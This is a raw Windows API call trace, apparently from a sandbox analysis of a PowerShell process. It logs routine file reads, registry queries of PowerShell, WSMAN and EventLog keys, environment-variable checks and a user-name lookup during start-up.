	[0546.406] ReadFile (in: hFile=0x324, lpBuffer=0x31c8928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c8928*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.406] ReadFile (in: hFile=0x324, lpBuffer=0x31c8928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c8928*, lpNumberOfBytesRead=0xad2d8*=0xe98, lpOverlapped=0x0) returned 1
	[0546.406] ReadFile (in: hFile=0x324, lpBuffer=0x31c7f28, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c7f28*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0546.406] ReadFile (in: hFile=0x324, lpBuffer=0x31c8928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x31c8928*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0546.406] CloseHandle (hObject=0x324) returned 1
	[0546.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0546.407] SetErrorMode (uMode=0x1) returned 0x1
	[0546.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0546.407] SetErrorMode (uMode=0x1) returned 0x1
	[0546.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0546.407] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x324) returned 0x0
	[0546.407] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0546.407] CoTaskMemAlloc (cb=0x5a) returned 0x2560b0
	[0546.407] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2560b0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0546.407] CoTaskMemFree (pv=0x2560b0) 
	[0546.408] RegCloseKey (hKey=0x324) returned 0x0
	[0546.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0546.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0546.408] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x91a8c488, Data2=0xab14, Data3=0x4e3b, Data4=([0]=0xac, [1]=0x9e, [2]=0xae, [3]=0x1e, [4]=0xf5, [5]=0x10, [6]=0xa4, [7]=0x3f))) returned 0x0
	[0547.236] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xbb335ca3, Data2=0x4237, Data3=0x49af, Data4=([0]=0x9e, [1]=0x1b, [2]=0xcf, [3]=0x36, [4]=0x1, [5]=0xb8, [6]=0xf4, [7]=0x7c))) returned 0x0
	[0547.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0547.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0547.272] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0547.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.272] CoTaskMemFree (pv=0x19b1a0) 
	[0547.274] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0547.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.274] CoTaskMemFree (pv=0x19b1a0) 
	[0547.275] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0547.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.275] CoTaskMemFree (pv=0x19b1a0) 
	[0547.277] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0547.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.277] CoTaskMemFree (pv=0x19b1a0) 
	[0548.276] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0548.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.276] CoTaskMemFree (pv=0x19b1a0) 
	[0548.288] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0548.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.288] CoTaskMemFree (pv=0x19b1a0) 
	[0548.290] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0548.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.290] CoTaskMemFree (pv=0x19b1a0) 
	[0549.374] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xad578 | out: phkResult=0xad578*=0x324) returned 0x0
	[0549.378] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad47c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad478, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad47c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad478*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0549.378] CoTaskMemFree (pv=0x0) 
	[0549.379] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0549.379] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x1e2120, lpcchValueName=0xad528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xad528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0549.379] CoTaskMemFree (pv=0x1e2120) 
	[0549.379] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0549.379] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x1e2120, lpcchValueName=0xad528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xad528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0549.379] CoTaskMemFree (pv=0x1e2120) 
	[0549.379] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0549.380] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x1e2120, lpcchValueName=0xad528, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xad528, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0549.380] CoTaskMemFree (pv=0x1e2120) 
	[0549.381] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad50c, lpData=0x0, lpcbData=0xad508*=0x0 | out: lpType=0xad50c*=0x1, lpData=0x0, lpcbData=0xad508*=0x8) returned 0x0
	[0549.381] CoTaskMemAlloc (cb=0xc) returned 0x245830
	[0549.381] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad4dc, lpData=0x245830, lpcbData=0xad4d8*=0x8 | out: lpType=0xad4dc*=0x1, lpData="2.0", lpcbData=0xad4d8*=0x8) returned 0x0
	[0549.381] CoTaskMemFree (pv=0x245830) 
	[0552.897] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4c8 | out: phkResult=0xad4c8*=0x324) returned 0x0
	[0552.898] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad3cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad3c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.898] CoTaskMemFree (pv=0x0) 
	[0552.898] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.898] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x1e2120, lpcchValueName=0xad478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xad478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0552.898] CoTaskMemFree (pv=0x1e2120) 
	[0552.898] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.898] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x1e2120, lpcchValueName=0xad478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xad478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0552.898] CoTaskMemFree (pv=0x1e2120) 
	[0552.898] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.898] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x1e2120, lpcchValueName=0xad478, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xad478, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0552.898] CoTaskMemFree (pv=0x1e2120) 
	[0552.898] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad45c, lpData=0x0, lpcbData=0xad458*=0x0 | out: lpType=0xad45c*=0x1, lpData=0x0, lpcbData=0xad458*=0x8) returned 0x0
	[0552.898] CoTaskMemAlloc (cb=0xc) returned 0x2458d0
	[0552.898] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad42c, lpData=0x2458d0, lpcbData=0xad428*=0x8 | out: lpType=0xad42c*=0x1, lpData="2.0", lpcbData=0xad428*=0x8) returned 0x0
	[0552.898] CoTaskMemFree (pv=0x2458d0) 
	[0552.900] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0552.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.900] CoTaskMemFree (pv=0x19b1a0) 
	[0552.905] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0552.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.905] CoTaskMemFree (pv=0x19b1a0) 
	[0552.910] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4f8 | out: phkResult=0xad4f8*=0x2f8) returned 0x0
	[0552.915] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad46c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad468, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad46c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad468*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.915] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.916] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.916] CoTaskMemFree (pv=0x1e2120) 
	[0552.916] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.916] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.916] CoTaskMemFree (pv=0x1e2120) 
	[0552.916] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.916] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.916] CoTaskMemFree (pv=0x1e2120) 
	[0552.916] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.916] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.916] CoTaskMemFree (pv=0x1e2120) 
	[0552.916] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.916] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.916] CoTaskMemFree (pv=0x1e2120) 
	[0552.916] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.916] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.916] CoTaskMemFree (pv=0x1e2120) 
	[0552.916] CoTaskMemFree (pv=0x0) 
	[0552.916] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.917] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.917] CoTaskMemFree (pv=0x1e2120) 
	[0552.917] CoTaskMemFree (pv=0x0) 
	[0552.917] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.917] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.917] CoTaskMemFree (pv=0x1e2120) 
	[0552.917] CoTaskMemFree (pv=0x0) 
	[0552.917] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0552.917] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x1e2120, lpcchName=0xad4f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad4f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0552.917] CoTaskMemFree (pv=0x1e2120) 
	[0552.917] CoTaskMemFree (pv=0x0) 
	[0552.917] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x2fc) returned 0x0
	[0552.917] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.917] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x300) returned 0x0
	[0552.917] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.917] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x1c0) returned 0x0
	[0552.917] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.918] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x328) returned 0x0
	[0552.918] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.918] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x32c) returned 0x0
	[0552.918] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.918] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x330) returned 0x0
	[0552.918] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.918] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x334) returned 0x0
	[0552.918] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.918] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x338) returned 0x0
	[0552.918] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x0) returned 0x2
	[0552.918] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x33c) returned 0x0
	[0552.919] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad558 | out: phkResult=0xad558*=0x340) returned 0x0
	[0552.919] RegCloseKey (hKey=0x340) returned 0x0
	[0552.919] RegCloseKey (hKey=0x2f8) returned 0x0
	[0552.920] RegCloseKey (hKey=0x33c) returned 0x0
	[0555.116] CoTaskMemAlloc (cb=0x804) returned 0x1b8fd370
	[0555.117] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8fd370, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0555.118] CoTaskMemFree (pv=0x1b8fd370) 
	[0555.119] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0555.119] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0555.120] CoTaskMemFree (pv=0x1e2120) 
	[0559.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4a8 | out: phkResult=0xad4a8*=0x30c) returned 0x0
	[0559.089] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad418, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad41c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad418*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.089] CoTaskMemFree (pv=0x0) 
	[0559.089] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.089] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.089] CoTaskMemFree (pv=0x1e2120) 
	[0559.089] CoTaskMemFree (pv=0x0) 
	[0559.089] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.089] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.089] CoTaskMemFree (pv=0x1e2120) 
	[0559.089] CoTaskMemFree (pv=0x0) 
	[0559.089] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.089] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.089] CoTaskMemFree (pv=0x1e2120) 
	[0559.089] CoTaskMemFree (pv=0x0) 
	[0559.089] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.089] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.089] CoTaskMemFree (pv=0x1e2120) 
	[0559.089] CoTaskMemFree (pv=0x0) 
	[0559.089] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.089] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.090] CoTaskMemFree (pv=0x1e2120) 
	[0559.090] CoTaskMemFree (pv=0x0) 
	[0559.090] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.090] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.090] CoTaskMemFree (pv=0x1e2120) 
	[0559.090] CoTaskMemFree (pv=0x0) 
	[0559.090] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.090] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.090] CoTaskMemFree (pv=0x1e2120) 
	[0559.090] CoTaskMemFree (pv=0x0) 
	[0559.090] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
